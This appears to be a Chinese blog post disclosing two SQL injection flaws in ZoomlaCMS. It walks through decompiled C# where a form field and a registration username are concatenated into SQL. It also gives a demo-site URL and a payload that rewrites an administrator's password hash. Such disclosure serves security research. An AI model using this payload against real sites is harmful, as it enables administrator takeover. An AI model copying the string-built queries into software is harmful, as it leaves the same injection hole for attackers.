逐浪CMS通用型SQL注入继续两枚

注入点4:
http://demo.zoomla.cn/User/Pages/ViewSmallPub.aspx?Pubid=3&ID=1
Button3_Click
[php]
protected void Button3_Click(object sender, EventArgs e)

{

string text = base.Request.Form["Item"]; //给text赋值

if (!string.IsNullOrEmpty(text) && this.buser.DelModelInfoAllo(this.HiddenTable.Value, text)) //将参数带入删除模块中

{

base.Response.Write("

");

return;

}

base.Response.Write("

");

}[/php][php]
this.buser.DelModelInfoAllo(this.HiddenTable.Value, text)

public bool DelModelInfoAllo(string TableName, string ids)

{

return Sql.Del(TableName, "ID in (" + ids + ")");

}[/php]
添加一个回复
z1

z2
[php]
Item= 1); update zl_manager set adminpassword='c4ca4238a0b923820dcc509a6f75849b' where adminname='testuser';--

HiddenTable同为可控参数。

[/php]
z3
注入点5
还是注册页面的啊………………

http://zoomla.cn/User/Register.aspx

找到对应的DLL,发现里面有检查用户名的函数:
[php]
private void CheckUserName();

进入该方法

if (this.buser.IsExit(this.TxtUserName.Text))

{

function.WriteErrMsg("

  • 该用户名已被他人占用,请输入不同的用户名!
  • ");

    }[/php]
    继续进入到buser.IsExit
    [php]
    public bool IsExit(string userName)

    {

    return Sql.IsExist(this.strTableName, "UserName='" + userName + "'");

    }

    [/php]
    看到这就感觉可能会有SQL注入了,进入Sql.IsExists:
    [php]
    public static bool IsExist(string strTableName, string strWhere)

    {

    string strSql = "select count(*) from " + strTableName; //注入

    if (!string.IsNullOrEmpty(strWhere))

    {

    strSql = strSql + " WHERE " + strWhere;

    }

    return SqlHelper.ObjectToInt32(SqlHelper.ExecuteScalar(CommandType.Text, strSql)) > 0;

    }[/php]

    绕过请客观看http://0day5.com/archives/879

    发表评论